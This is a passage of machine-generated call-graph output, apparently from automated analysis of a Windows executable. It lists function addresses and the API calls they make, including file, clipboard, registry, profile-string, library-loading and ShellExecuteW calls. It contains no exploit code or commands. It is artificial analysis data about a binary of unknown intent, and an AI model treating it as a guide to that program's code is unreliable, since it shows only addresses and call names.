401c14 abs 5684->5687 5685 4025a8 4 API calls 5686 401c46 abs 5685->5686 5686->5687 5687->5677 5687->5684 5687->5685 5698 4025a8 5687->5698 5689 406aef 5688->5689 5690 406ad6 5688->5690 5691 406b2f 5689->5691 5692 406b0f free 5689->5692 5690->5689 5695 406b18 memcpy 5690->5695 5694 4044df 3 API calls 5691->5694 5693 406b3f 5692->5693 5697 406b49 memcpy 5693->5697 5694->5693 5696 402112 5695->5696 5697->5696 5699 4025b3 5698->5699 5703 4025d1 5698->5703 5700 4025c4 5699->5700 5701 4025bb free 5699->5701 5702 4044df 3 API calls 5700->5702 5701->5703 5702->5703 5703->5687 5704 40b7cc 5705 40b458 2 API calls 5704->5705 5706 40b7d6 5705->5706 4879 40184d 4882 409e0d 4879->4882 4881 401858 4883 409e19 4882->4883 4884 409e1e memcpy memcpy GetModuleHandleW DialogBoxParamW 4882->4884 4883->4881 4884->4881 4885 405b4d 4886 40b780 4885->4886 4887 405b5a memset GetDlgCtrlID GetWindowTextW 4886->4887 4888 405bfc 4887->4888 4889 405b9e 4887->4889 4889->4888 4890 405ba7 memset GetClassNameW _wcsicmp 4889->4890 4890->4888 4891 405bef 4890->4891 4892 405a25 5 API calls 4891->4892 4892->4888 5707 408cce 5708 408ce1 5707->5708 5709 408e41 5708->5709 5710 408d00 5708->5710 5755 40896a 5708->5755 5711 408d1b 5710->5711 5713 407e37 11 API calls 5710->5713 5714 408d22 SendMessageW 5711->5714 5715 408d34 5711->5715 5713->5711 5714->5715 5716 408d42 5715->5716 5717 408a26 4 API calls 5715->5717 5718 408d65 5716->5718 5719 407e37 11 API calls 5716->5719 5717->5716 5720 408d78 5718->5720 5764 401aef PostMessageW 5718->5764 5722 408d5e 5719->5722 5721 408ddb 5720->5721 5724 401000 wcsncat 5720->5724 5725 408ded 5721->5725 5765 4088f7 memset 5721->5765 5726 40831a 2 API calls 5722->5726 5727 408d99 5724->5727 5729 408e1a 5725->5729 5732 408e03 5725->5732 5733 406211 SendMessageW 5725->5733 5726->5718 5731 401000 wcsncat 5727->5731 5730 408e51 5729->5730 5729->5732 5734 408e46 5729->5734 5736 408e5f 5730->5736 5770 40883c GetTempPathW 5730->5770 5735 408da9 5731->5735 5737 406211 SendMessageW 5732->5737 5733->5729 5739 406211 SendMessageW 5734->5739 5738 401515 2 API calls 5735->5738 5741 408e7e 5736->5741 5744 407e37 11 API calls 5736->5744 5737->5709 5743 408dbe SetFocus 5738->5743 5739->5730 5742 408e8e 5741->5742 5784 408c2d 5741->5784 5747 408e9e 5742->5747 5749 408c2d 39 API calls 5742->5749 5743->5721 5745 408e77 5744->5745 5748 40831a 2 API calls 5745->5748 5753 408ed1 5747->5753 5789 40309e ??2@YAPAXI 5747->5789 5748->5741 5749->5747 5751 408ef1 5751->5709 5812 407868 5751->5812 5753->5751 5806 4067cb 5753->5806 5756 40b780 5755->5756 5757 40897a memset 5756->5757 5815 4015c1 5757->5815 5760 408a0f 5760->5710 5761 409e76 6 API calls 5762 4089ec 5761->5762 5818 401aef PostMessageW 5762->5818 5764->5720 5819 4086ef memset 5765->5819 5768 408966 5768->5725 5771 408860 GetWindowsDirectoryW 5770->5771 5772 40886e GetTempFileNameW 5770->5772 5771->5772 5773 4087f2 38 API calls 5772->5773 5774 4088ab 5773->5774 5775 4088f3 5774->5775 5776 4088af OpenClipboard 5774->5776 5775->5736 5777 4088ce GetLastError 5776->5777 5778 4088bf 5776->5778 5780 4088cb 5777->5780 5885 4043cd EmptyClipboard 5778->5885 5781 4088e6 DeleteFileW 5780->5781 5782 40428f 9 API calls 5780->5782 5781->5775 5783 4088e5 5782->5783 5783->5781 5785 4087f2 38 API calls 5784->5785 5786 408c4d 5785->5786 5787 408c5d 5786->5787 5896 40496b ShellExecuteW 5786->5896 5787->5742 5790 4030b8 5789->5790 5791 4030d2 5790->5791 5792 4030c9 ??3@YAXPAX 5790->5792 5793 4027f1 2 API calls 5791->5793 5792->5791 5794 4030de ??2@YAPAXI memset 5793->5794 5795 405fdc 2 API calls 5794->5795 5796 403113 5795->5796 5797 403118 ??2@YAPAXI 5796->5797 5799 40313c 5796->5799 5797->5799 5798 401515 2 API calls 5800 403164 5798->5800 5799->5798 5801 403182 SetFocus 5800->5801 5802 405f41 SendMessageW 5800->5802 5803 403192 ??3@YAXPAX 5801->5803 5804 40319b 5801->5804 5805 403174 InvalidateRect 5802->5805 5803->5804 5804->5753 5805->5801 5807 4027f1 2 API calls 5806->5807 5810 4067da 5807->5810 5808 40680c 5808->5751 5809 4067ea SendMessageW 5809->5810 5811 4067f9 SendMessageW 5809->5811 5810->5808 5810->5809 5811->5810 5813 407873 GetModuleHandleW 752419E0 5812->5813 5814 4078ca 5812->5814 5813->5709 5814->5709 5816 401515 2 API calls 5815->5816 5817 4015cf 5816->5817 5817->5760 5817->5761 5818->5760 5820 4053f1 16 API calls 5819->5820 5821 408733 5820->5821 5822 4053f1 16 API calls 5821->5822 5823 408744 5822->5823 5824 4053f1 16 API calls 5823->5824 5825 408754 5824->5825 5826 4053f1 16 API calls 5825->5826 5827 408762 5826->5827 5828 4053f1 16 API calls 5827->5828 5829 408777 5828->5829 5830 4053f1 16 API calls 5829->5830 5831 408788 5830->5831 5832 4053f1 16 API calls 5831->5832 5833 408798 5832->5833 5834 4053f1 16 API calls 5833->5834 5835 4087aa 5834->5835 5847 404c22 memset 5835->5847 5838 4053f1 16 API calls 5839 4087c8 5838->5839 5850 404a67 5839->5850 5841 4087e8 5841->5768 5842 4087f2 5841->5842 5854 4075af 5842->5854 5845 408835 5845->5768 5846 40428f 9 API calls 5846->5845 5848 404c5b _snwprintf wcslen memcpy wcslen memcpy 5847->5848 5848->5848 5849 404ccd 5848->5849 5849->5838 5851 404a74 5850->5851 5852 404ad9 5851->5852 5853 404ac9 wcscpy 5851->5853 5852->5841 5853->5841 5855 4075c1 5854->5855 5856 40652d 3 API calls 5854->5856 5874 40422f CreateFileW 5855->5874 5856->5855 5858 4076eb 5858->5845 5858->5846 5859 4075f5 5876 404177 LoadCursorW SetCursor 5859->5876 5860 4075c9 5860->5858 5860->5859 5875 404afc WriteFile 5860->5875 5863 407604 5864 40763a 5863->5864 5865 407654 5863->5865 5866 406d7d 2 API calls 5863->5866 5864->5865 5867 406c4e 14 API calls 5864->5867 5868 406204 SendMessageW 5865->5868 5866->5864 5867->5865 5873 407669 5868->5873 5869 406811 SendMessageW 5869->5873 5871 4076ac CloseHandle SetCursor 5871->5858 5873->5869 5873->5871 5877 407572 5873->5877 5874->5860 5875->5859 5876->5863 5878 40757b 5877->5878 5879 40758e 5877->5879 5883 402ae4 SendMessageW 5878->5883 5884 402695 SendMessageW 5879->5884 5882 40758a 5882->5873 5883->5882 5884->5882 5895 404216 CreateFileW 5885->5895 5887 4043e5 5888 4043ee GetFileSize GlobalAlloc 5887->5888 5889 40445f GetLastError 5887->5889 5890 404411 GlobalLock ReadFile 5888->5890 5891 404448 GetLastError 5888->5891 5892 404468 CloseClipboard 5889->5892 5890->5891 5893 40442f GlobalUnlock SetClipboardData 5890->5893 5894 404451 CloseHandle 5891->5894 5892->5780 5893->5894 5894->5892 5895->5887 5896->5787 3875 416951 3878 41695c VirtualProtect 3875->3878 3877 4169d5 3878->3877 4893 402e51 4894 402e69 4893->4894 4897 402f99 4893->4897 4895 402f71 SendDlgItemMessageW 4894->4895 4898 402e74 4894->4898 4896 402cde 13 API calls 4895->4896 4899 402f6c 4896->4899 4901 402fb6 4897->4901 4967 402b79 4897->4967 4898->4899 4908 402e9e 4898->4908 4932 402c12 GetDlgItem GetDlgItemInt 4898->4932 4901->4899 4902 40302b 4901->4902 4972 402695 SendMessageW 4901->4972 4902->4899 4975 40143c GetDlgItem EnableWindow 4902->4975 4903 402ee2 4904 402f00 4903->4904 4905 402ef5 GetDlgItem 4903->4905 4911 402f13 4904->4911 4912 402f08 GetDlgItem 4904->4912 4947 40292d SendMessageW 4905->4947 4908->4899 4908->4903 4936 402cde GetDlgItem SendMessageW SendMessageW 4908->4936 4916 402f29 4911->4916 4917 402f1b GetDlgItem 4911->4917 4952 402970 SendMessageW 4912->4952 4913 402fed 4913->4902 4973 40143c GetDlgItem EnableWindow 4913->4973 4921 402f41 4916->4921 4922 402f33 GetDlgItem 4916->4922 4957 4029ac SendMessageW 4917->4957 4918 403056 4976 40143c GetDlgItem EnableWindow 4918->4976 4924 402f50 EndDialog 4921->4924 4925 402f57 4921->4925 4927 4029ac 3 API calls 4922->4927 4924->4925 4925->4899 4962 402c6a GetDlgItem 4925->4962 4926 403011 4974 40143c GetDlgItem EnableWindow 4926->4974 4927->4921 4928 403072 SetDlgItemInt 4928->4899 4933 402c46 4932->4933 4934 402c54 4932->4934 4977 402ab0 SendMessageW 4933->4977 4934->4908 4937 402d1d SendMessageW 4936->4937 4937->4937 4938 402d2d 4937->4938 4939 4026de 2 API calls 4938->4939 4940 402d44 4939->4940 4941 402e31 4940->4941 4943 402d77 memset SendMessageW 4940->4943 4979 402761 4940->4979 4982 402b01 SendMessageW 4940->4982 4983 40266f SendMessageW 4941->4983 4943->4940 4944 402e3e SetFocus 4944->4903 4948 40296c 4947->4948 4950 40294b 4947->4950 4948->4904 4950->4948 4984 402695 SendMessageW 4950->4984 4985 40280c 4950->4985 4955 402989 4952->4955 4953 4029a8 4953->4911 4955->4953 4956 40280c 7 API calls 4955->4956 5003 402695 SendMessageW 4955->5003 4956->4955 4958 4029f4 4957->4958 4960 4029cb 4957->4960 4958->4916 4960->4958 5004 402695 SendMessageW 4960->5004 5005 402b01 SendMessageW 4960->5005 4963 402cda EndDialog 4962->4963 4966 402c92 4962->4966 4963->4899 4966->4963 5006 4026ad 4966->5006 5009 402ae4 SendMessageW 4966->5009 5011 402ae4 SendMessageW 4967->5011 4969 402b86 5012 402b01 SendMessageW 4969->5012 4971 402b99 4971->4901 4972->4913 4973->4926 4974->4902 4975->4918 4976->4928 4978 402ac8 4977->4978 4978->4934 4980 402784 wcslen 4979->4980 4981 40278e SendMessageW 4979->4981 4980->4981 4981->4940 4982->4940 4983->4944 4984->4950 4986 402819 4985->4986 4997 4027b6 SendMessageW 4986->4997 4988 40284b 4998 4027b6 SendMessageW 4988->4998 4990 402862 4991 402929 4990->4991 4992 402877 SendMessageW SendMessageW 4990->4992 4991->4950 4999 4027f1 4992->4999 4994 402b9d SendMessageW 4995 4028b3 4994->4995 4995->4991 4995->4994 4996 402b34 SendMessageW 4995->4996 4996->4995 4997->4988 4998->4990 5002 4027dd SendMessageW 4999->5002 5001 4027fa SendMessageW 5001->4995 5002->5001 5003->4955 5004->4960 5005->4960 5010 4027b6 SendMessageW 5006->5010 5008 4026c6 5008->4966 5009->4966 5010->5008 5011->4969 5012->4971 5013 402551 5014 4064f2 SendMessageW 5013->5014 5015 402570 5014->5015 5018 404762 5015->5018 5019 404778 5018->5019 5027 402586 5018->5027 5028 40473c modf 5019->5028 5021 4047a3 5029 40473c modf 5021->5029 5023 404805 5030 40473c modf 5023->5030 5025 40482f 5031 40473c modf 5025->5031 5028->5021 5029->5023 5030->5025 5031->5027 5897 40b6d1 5898 40b6e4 _c_exit 5897->5898 5899 40b6dd _exit 5897->5899 5900 40b6ea 5898->5900 5899->5898 5032 401e52 5033 401e69 5032->5033 5035 401e83 5032->5035 5034 401e70 _ultow 5033->5034 5033->5035 5036 401ed2 5033->5036 5034->5035 5036->5035 5037 4053f1 16 API calls 5036->5037 5037->5035 5038 40b853 5039 40b863 5038->5039 5040 40b85c FreeLibrary 5038->5040 5040->5039 5041 402353 5042 402360 5041->5042 5058 404248 wcslen WriteFile 5042->5058 5044 402375 memset memset memset 5045 4023e5 5044->5045 5046 4023c7 _snwprintf 5044->5046 5047 402400 _snwprintf 5045->5047 5048 4023ed wcscpy 5045->5048 5046->5045 5059 404248 wcslen WriteFile 5047->5059 5048->5047 5051 402450 5052 4053f1 16 API calls 5051->5052 5053 402460 _snwprintf 5052->5053 5060 404248 wcslen WriteFile 5053->5060 5055 402486 5056 40249a 5055->5056 5061 4073d9 ??2@YAPAXI 5055->5061 5058->5044 5059->5051 5060->5055 5062 4073fe 5061->5062 5065 40b0b3 5062->5065 5066 40b780 5065->5066 5067 40b0c0 memset memset memset 5066->5067 5068 40b111 5067->5068 5069 40b13a 5067->5069 5082 40aeb5 _snwprintf 5068->5082 5070 40b17a _snwprintf 5069->5070 5083 40aeb5 _snwprintf 5069->5083 5084 404248 wcslen WriteFile 5070->5084 5074 40b120 _snwprintf 5074->5069 5075 40b14f _snwprintf wcscpy 5075->5070 5076 40b1a6 5077 40b1be memset 5076->5077 5079 40b200 _snwprintf 5076->5079 5081 407440 ??3@YAXPAX 5076->5081 5077->5076 5078 40b1dd _snwprintf 5077->5078 5078->5079 5085 404248 wcslen WriteFile 5079->5085 5081->5056 5082->5074 5083->5075 5084->5076 5085->5076 4148 40ab55 4151 40a8e8 4148->4151 4152 40a8f5 4151->4152 4153 40a914 memset 4152->4153 4154 40a947 memset GetPrivateProfileStringW 4152->4154 4164 404b1b 4153->4164 4159 404ba4 wcslen 4154->4159 4158 40a986 4160 404bb8 4159->4160 4161 404bba 4159->4161 4160->4158 4162 404bf0 wcstoul 4161->4162 4163 404c0e 4161->4163 4162->4161 4163->4158 4166 404b2f 4164->4166 4167 404b8f WritePrivateProfileStringW 4164->4167 4165 404b3d _snwprintf memcpy 4165->4166 4165->4167 4166->4165 4166->4167 4167->4158 5901 4014d6 5902 4014e2 ExitProcess 5901->5902 5903 4014ea 5901->5903 5086 407457 memset memset 5093 404248 wcslen WriteFile 5086->5093 5088 4074a4 5094 406b6d wcscpy 5088->5094 5090 4074ba _snwprintf 5097 404248 wcslen WriteFile 5090->5097 5092 4074e2 5093->5088 5095 406b80 5094->5095 5096 406b92 _wcslwr 5095->5096 5096->5090 5097->5092 5907 4078da 5912 4078f0 5907->5912 5913 407969 5907->5913 5908 407921 wcscmp 5908->5912 5909 407928 _wcsicmp 5909->5912 5911 40434a 3 API calls 5911->5912 5912->5908 5912->5909 5912->5911 5912->5913 5914 4042f2 wcslen wcslen 5912->5914 5915 404319 5914->5915 5916 40433d 5914->5916 5915->5916 5917 404321 memcmp 5915->5917 5916->5912 5917->5915 5917->5916 5101 40145d 5102 401469 5101->5102 5106 401490 5102->5106 5107 405810 5102->5107 5108 40581d 5107->5108 5109 40147d 5108->5109 5110 405834 memset 5108->5110 5116 405239 5109->5116 5111 405893 2 API calls 5110->5111 5112 405858 5111->5112 5113 40593f 3 API calls 5112->5113 5114 405869 5113->5114 5114->5109 5115 405870 SetWindowTextW 5114->5115 5115->5109 5117 405243 5116->5117 5118 405254 ??2@YAPAXI memset memcpy 5116->5118 5117->5118 5120 40529e 5117->5120 5119 405297 ??3@YAXPAX 5118->5119 5118->5120 5119->5120 5120->5106 5121 408f62 5122 408f7f 5121->5122 5134 408fc7 5121->5134 5125 408f8b memset 5122->5125 5122->5134 5123 408fd8 SendMessageW 5124 40900b 5123->5124 5126 408fef GetMenuStringW 5123->5126 5127 409075 5124->5127 5130 40901f 5124->5130 5138 408a26 5124->5138 5128 401000 wcsncat 5125->5128 5126->5124 5131 408fb6 5128->5131 5135 409034 5130->5135 5144 406696 5130->5144 5137 40496b ShellExecuteW 5131->5137 5134->5123 5134->5124 5135->5127 5155 401aef PostMessageW 5135->5155 5137->5134 5139 402ab0 SendMessageW 5138->5139 5141 408a46 5139->5141 5140 408a8a SetFocus 5140->5130 5141->5140 5156 401515 5141->5156 5143 408a82 5143->5140 5145 4066a5 5144->5145 5146 40674b SendMessageW 5145->5146 5159 4027dd SendMessageW 5145->5159 5146->5135 5148 4066eb 5149 406716 5148->5149 5160 4029f8 SendMessageW 5148->5160 5161 4027dd SendMessageW 5149->5161 5152 406730 5162 4029f8 SendMessageW 5152->5162 5154 406747 5154->5146 5155->5127 5157 405557 GetModuleHandleW 5156->5157 5158 40152d DialogBoxParamW 5157->5158 5158->5143 5159->5148 5160->5148 5161->5152 5162->5154 3889 4022e3 3890 4022f9 3889->3890 3896 403e9b 3890->3896 3893 402351 3956 409ebb memset 3896->3956 3899 402316 3899->3893 3939 4053f1 3899->3939 3900 403eca memset WideCharToMultiByte 3901 403efe 3900->3901 3902 403f13 6 API calls 3901->3902 3903 4040a6 3901->3903 3904 403fb3 wcslen wcslen 3902->3904 3905 403f9f 3902->3905 3903->3899 3907 40414a SetCurrentDirectoryW 3903->3907 3909 403ff2 wcslen wcslen 3904->3909 3910 403fde 3904->3910 3973 40468e wcscpy 3905->3973 3907->3899 3913 404031 wcslen wcslen 3909->3913 3914 40401d 3909->3914 3911 40468e 4 API calls 3910->3911 3911->3909 3917 404070 3913->3917 3918 40405c 3913->3918 3915 40468e 4 API calls 3914->3915 3915->3913 3976 404530 GetFileAttributesW 3917->3976 3919 40468e 4 API calls 3918->3919 3919->3917 3921 40408b 3922 404090 3921->3922 3923 4040ab 3921->3923 3977 403a29 3922->3977 3993 404530 GetFileAttributesW 3923->3993 3926 4040b8 3927 4040d5 3926->3927 3928 4040bd 3926->3928 4012 404530 GetFileAttributesW 3927->4012 3994 403c5b 3928->3994 3931 4040e2 3932 4040e7 3931->3932 3933 4040ff 3931->3933 3935 403c5b 28 API calls 3932->3935 4013 404530 GetFileAttributesW 3933->4013 3935->3933 3936 40410c 3936->3903 3937 404111 3936->3937 3938 403c5b 28 API calls 3937->3938 3938->3903 3940 4053fa 3939->3940 3942 4053ff 3939->3942 4134 40534f 3940->4134 3943 40545e 3942->3943 3944 40542f GetModuleHandleW 3942->3944 3951 402339 GetParent MessageBoxW 3942->3951 3946 4054b5 3943->3946 3947 405468 wcscpy 3943->3947 3945 4054c8 LoadStringW 3944->3945 3948 4054d3 3945->3948 4140 405557 3946->4140 4137 4058e3 memset _itow 3947->4137 3948->3951 3955 4054f4 memcpy 3948->3955 3951->3893 3953 40548a wcslen 3953->3948 3954 40549c GetModuleHandleW 3953->3954 3954->3945 3955->3951 3957 409ee9 3956->3957 3958 409efb 3956->3958 4014 40353e memset 3957->4014 4039 4044b1 wcslen 3958->4039 3961 409ef4 3962 409f20 GetCurrentDirectoryW SetCurrentDirectoryW memset wcslen wcslen 3961->3962 3963 403ec2 3961->3963 3964 409f8d GetModuleHandleW 3962->3964 3965 409f76 3962->3965 3963->3899 3963->3900 3968 409fde 7 API calls 3964->3968 3969 409faf LoadLibraryExW 3964->3969 3966 40468e 4 API calls 3965->3966 3966->3964 3968->3963 3969->3968 3970 409fc7 3969->3970 4042 409e76 GetModuleHandleW GetModuleHandleW GetModuleHandleW 3970->4042 4083 40426c wcslen 3973->4083 3976->3921 3978 403a36 3977->3978 4087 40b251 3978->4087 3980 403a49 3981 403a51 memset WideCharToMultiByte 3980->3981 3983 403c3c 3980->3983 3988 403a8c 3981->3988 3982 403ae3 memset memset 3982->3988 3983->3903 3984 403b72 _mbscpy 3984->3988 3985 403b86 _mbscpy 3985->3988 3986 403b9c _mbscpy 3986->3988 3987 403bb2 _mbscpy 3987->3988 3988->3982 3988->3983 3988->3984 3988->3985 3988->3986 3988->3987 3989 403bc8 _mbscpy 3988->3989 3990 403bde _mbscpy 3988->3990 3991 403bef memset WideCharToMultiByte 3988->3991 3989->3988 3990->3991 4104 4038fa 3991->4104 3993->3926 3995 403c68 3994->3995 4128 404216 CreateFileW 3995->4128 3997 403c73 3998 403c80 GetFileSize 3997->3998 3999 403e94 3997->3999 4000 403c94 ??2@YAPAXI 3998->4000 4001 403e8b CloseHandle 3998->4001 3999->3927 4129 404add ReadFile 4000->4129 4001->3999 4003 403caa memset memset memset 4009 403d09 4003->4009 4005 403e84 ??3@YAXPAX 4005->4001 4006 403d14 strcmp 4006->4009 4007 403db8 _mbscpy 4007->4009 4008 403dca _mbscpy memset WideCharToMultiByte 4010 4038fa 12 API calls 4008->4010 4009->4005 4009->4006 4009->4007 4009->4008 4011 403e4a strcmp 4009->4011 4130 403763 4009->4130 4010->4009 4011->4009 4012->3931 4013->3936 4049 40a9bf RegOpenKeyExW 4014->4049 4016 40358d 4017 4036e5 wcscpy 4016->4017 4018 403598 memset 4016->4018 4019 40374e 4017->4019 4020 4036f9 ExpandEnvironmentStringsW 4017->4020 4021 40365d 4018->4021 4019->3961 4050 403473 memset wcslen wcslen 4020->4050 4025 4035c4 _wcsnicmp 4021->4025 4026 4036dc RegCloseKey 4021->4026 4034 403473 12 API calls 4021->4034 4036 40367e CompareFileTime 4021->4036 4038 403699 wcscpy 4021->4038 4071 40aa59 RegEnumKeyExW 4021->4071 4025->4021 4027 4035e2 memset memset _snwprintf 4025->4027 4026->4017 4064 40aa15 4027->4064 4032 403473 12 API calls 4033 40372d 4032->4033 4033->4019 4035 40373a GetCurrentDirectoryW 4033->4035 4034->4021 4037 403473 12 API calls 4035->4037 4036->4021 4036->4038 4037->4019 4038->4021 4040 4044c2 4039->4040 4041 4044c5 memcpy 4039->4041 4040->4041 4041->3961 4043 409ea5 FreeLibrary 4042->4043 4044 409ea8 4042->4044 4043->4044 4045 409eac FreeLibrary 4044->4045 4046 409eaf 4044->4046 4045->4046 4047 409eb3 FreeLibrary 4046->4047 4048 409eb6 LoadLibraryExW 4046->4048 4047->4048 4048->3963 4048->3968 4049->4016 4051 4034cd 4050->4051 4052 4034be 4050->4052 4072 404530 GetFileAttributesW 4051->4072 4053 40468e 4 API calls 4052->4053 4053->4051 4055 4034e5 4056 403531 4055->4056 4057 4034ee memset 4055->4057 4056->4019 4060 404571 4056->4060 4073 404d0e FindFirstFileW 4057->4073 4079 40455f GetModuleFileNameW 4060->4079 4062 404577 wcslen 4063 403725 4062->4063 4063->4032 4080 40a9bf RegOpenKeyExW 4064->4080 4066 40aa2b 4067 40364c wcsrchr 4066->4067 4081 40a9d9 RegQueryValueExW 4066->4081 4067->4021 4071->4021 4072->4055 4074 404d33 4073->4074 4075 40351e 4073->4075 4076 404d4f FindClose 4074->4076 4077 404d3d FindNextFileW 4074->4077 4075->4056 4076->4075 4077->4074 4077->4076 4079->4062 4080->4066 4082 40a9fe RegCloseKey 4081->4082 4082->4067 4084 404277 4083->4084 4085 40428c wcscat 4083->4085 4084->4085 4086 40427f wcscat 4084->4086 4085->3904 4086->4085 4088 40b267 memset 4087->4088 4099 40b3f3 4087->4099 4089 40b289 wcscpy 4088->4089 4090 40b29c 4088->4090 4091 40b2a7 4089->4091 4092 40353e 31 API calls 4090->4092 4093 40b352 LoadLibraryW 4091->4093 4094 40b2b6 memset wcscpy wcscat 4091->4094 4092->4091 4095 40b366 LoadLibraryW 4093->4095 4097 40b36d 4093->4097 4114 404530 GetFileAttributesW 4094->4114 4095->4097 4098 40b37b 9 API calls 4097->4098 4097->4099 4098->4099 4099->3980 4100 40b2fe 4101 40b305 wcscpy wcscat 4100->4101 4102 40b32c GetModuleHandleW 4100->4102 4101->4102 4102->4097 4103 40b340 LoadLibraryExW 4102->4103 4103->4097 4115 40b780 4104->4115 4107 403948 4108 403949 _mbscpy 4107->4108 4117 4037e2 4108->4117 4111 4037e2 3 API calls 4112 403988 6 API calls 4111->4112 4113 403a22 4112->4113 4113->3988 4114->4100 4116 403907 memset memset 4115->4116 4116->4107 4116->4108 4118 403802 4117->4118 4123 403813 4117->4123 4119 40380b 4118->4119 4120 40381f memset 4118->4120 4126 401341 strlen 4119->4126 4122 401341 strlen 4120->4122 4124 403846 4122->4124 4123->4111 4124->4123 4125 4038cc memcpy 4124->4125 4125->4123 4127 401360 4126->4127 4127->4123 4128->3997 4129->4003 4131 40377a 4130->4131 4133 403776 4130->4133 4132 4037a5 memcpy 4131->4132 4131->4133 4132->4133 4133->4009 4135 4053f0 4134->4135 4136 40535c ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 4134->4136 4135->3942 4136->4135 4143 40593f 4137->4143 4139 405483 4139->3953 4139->3954 4141 405560 GetModuleHandleW 4140->4141 4142 405567 4140->4142 4141->4142 4142->3945 4144 40b780 4143->4144 4145 40594c memset GetPrivateProfileStringW 4144->4145 4146 405998 wcscpy 4145->4146 4147 4059ae 4145->4147 4146->4139 4147->4139 5921 4074eb memset memset 5922 407535 5921->5922 5923 406b6d 2 API calls 5922->5923 5924 407541 _snwprintf 5923->5924 5927 404248 wcslen WriteFile 5924->5927 5926 407569 5927->5926 5928 4017eb 5929 4017f7 5928->5929 5930 405239 4 API calls 5929->5930 5931 401817 5929->5931 5930->5931 5932 40b7f0 5933 40b800 5932->5933 5934 40b7f9 ??3@YAXPAX 5932->5934 5934->5933 5163 401571 5164 405557 GetModuleHandleW 5163->5164 5165 40158a CreateDialogParamW 5164->5165 5166 405810 7 API calls 5165->5166 5167 40159b 5166->5167 5168 4015a3 ShowWindow UpdateWindow 5167->5168 5935 4076f4 5936 407703 5935->5936 5937 4076fc 5935->5937 5938 4053f1 16 API calls 5937->5938 5939 407701 5938->5939 5169 40ad77 memset 5170 40ada4 5169->5170 5173 40adbb 5169->5173 5171 40ada7 SHGetPathFromIDListW 5170->5171 5172 40adec 5170->5172 5171->5172 5171->5173 5173->5172 5174 40ade3 SendMessageW 5173->5174 5174->5172 5940 4038f8 5941 4038fa 5940->5941 5942 403907 memset memset 5941->5942 5943 403948 5942->5943 5944 403949 _mbscpy 5942->5944 5943->5944 5945 4037e2 3 API calls 5944->5945 5946 403970 5945->5946 5947 4037e2 3 API calls 5946->5947 5948 403988 6 API calls 5947->5948 5949 403a22 5948->5949 5175 40ab7a 5176 40ab9c GetPrivateProfileStringW 5175->5176 5177 40ab8d WritePrivateProfileStringW 5175->5177 5178 40abaf 5176->5178 5177->5178 4721 40abfc FindResourceW 4722 40ac15 SizeofResource 4721->4722 4723 40ac3f 4721->4723 4722->4723 4724 40ac26 LoadResource 4722->4724 4724->4723 4725 40ac34 LockResource 4724->4725 4725->4723 5179 40907c 5180 4091c0 5179->5180 5181 40909a 5179->5181 5183 4091c9 5180->5183 5184 4091fd 5180->5184 5182 4090a0 5181->5182 5188 4091b0 5181->5188 5186 409194 5182->5186 5187 4090a9 5182->5187 5183->5188 5189 4091cc 5183->5189 5225 40805f SendMessageW 5184->5225 5191 40919b PostMessageW 5186->5191 5192 4090dc 5186->5192 5194 4090b2 5187->5194 5195 409165 5187->5195 5213 407fc5 5188->5213 5189->5192 5196 4091d1 SetFocus 5189->5196 5190 4091be 5201 407e37 11 API calls 5190->5201 5191->5192 5198 409231 5192->5198 5203 409233 5192->5203 5204 40922c 5192->5204 5199 4090e1 5194->5199 5200 4090b7 5194->5200 5195->5192 5197 409174 GetModuleHandleW LoadCursorW SetCursor 5195->5197 5196->5192 5197->5198 5199->5192 5202 4090f3 SetBkMode SetTextColor SelectObject DrawTextExW SelectObject 5199->5202 5200->5192 5208 408f10 GetCursorPos GetSubMenu 5200->5208 5201->5192 5202->5192 5203->5198 5207 409237 SetFocus 5203->5207 5231 407977 5204->5231 5207->5198 5209 40676b 3 API calls 5208->5209 5210 408f40 5209->5210 5211 407e37 11 API calls 5210->5211 5212 408f45 TrackPopupMenu 5211->5212 5212->5192 5214 406204 SendMessageW 5213->5214 5215 407fdb 5214->5215 5216 4053f1 16 API calls 5215->5216 5217 407fe4 _snwprintf 5216->5217 5218 40676b 3 API calls 5217->5218 5219 408007 5218->5219 5220 408038 5219->5220 5221 4053f1 16 API calls 5219->5221 5222 408043 SendMessageW 5220->5222 5223 40805d 5220->5223 5224 408014 _snwprintf wcscat 5221->5224 5222->5223 5223->5190 5224->5220 5242 404177 LoadCursorW SetCursor 5225->5242 5227 40808c SendMessageW 5228 4080b5 5227->5228 5229 407fc5 23 API calls 5228->5229 5230 4080c7 6 API calls 5229->5230 5230->5190 5232 406204 SendMessageW 5231->5232 5233 40798d 5232->5233 5243 402a3e SendMessageW 5233->5243 5236 4079a0 5237 4079f6 5236->5237 5238 4079f8 5236->5238 5249 406811 5236->5249 5237->5198 5252 406211 5238->5252 5241 406211 SendMessageW 5241->5237 5242->5227 5244 402a60 5243->5244 5248 402a78 5243->5248 5246 402a7e 5244->5246 5244->5248 5255 402695 SendMessageW 5244->5255 5246->5248 5256 4027b6 SendMessageW 5246->5256 5248->5236 5250 4026ad SendMessageW 5249->5250 5251 40682a 5250->5251 5251->5236 5257 40266f SendMessageW 5252->5257 5254 406228 SendMessageW 5254->5241 5255->5244 5256->5248 5257->5254 5258 40327e GetDlgItem 5271 40ae7b LoadLibraryW GetProcAddress 5258->5271 5260 40329a GetDlgItem 5261 40ae7b 3 API calls 5260->5261 5262 4032ac GetClientRect GetWindow GetWindow 5261->5262 5263 4032dd 5262->5263 5274 401681 GetWindowRect MapWindowPoints 5263->5274 5265 4032e2 GetWindow 5265->5263 5266 4032ed 5265->5266 5275 401663 5266->5275 5272 40aea9 FreeLibrary 5271->5272 5273 40ae9c 5271->5273 5272->5260 5273->5272 5274->5265 5276 40166d 5275->5276 5284 4048c4 5276->5284 5278 40167c 5279 403259 5278->5279 5291 40143c GetDlgItem EnableWindow 5279->5291 5281 40326e 5292 40143c GetDlgItem EnableWindow 5281->5292 5283 40327c 5287 404875 GetSystemMetrics GetSystemMetrics 5284->5287 5288 404893 5287->5288 5289 404897 73A1A570 5287->5289 5288->5289 5290 4048ad GetWindowRect MoveWindow 5288->5290 5289->5290 5290->5278 5291->5281 5292->5283 5950 4056fe 5951 40575b 5950->5951 5952 40570e GetParent GetWindowRect GetClientRect MapWindowPoints SetWindowPos 5950->5952 5952->5951 3888 40ac82 EnumResourceNamesW 5296 403309 5307 404605 5296->5307 5298 40332d 5299 404605 2 API calls 5298->5299 5300 403343 5299->5300 5310 401410 5300->5310 5303 404605 2 API calls 5304 403373 5303->5304 5305 401410 2 API calls 5304->5305 5306 403389 5305->5306 5308 40460e SetDlgItemTextW 5307->5308 5309 40461f GetDlgItemTextW 5307->5309 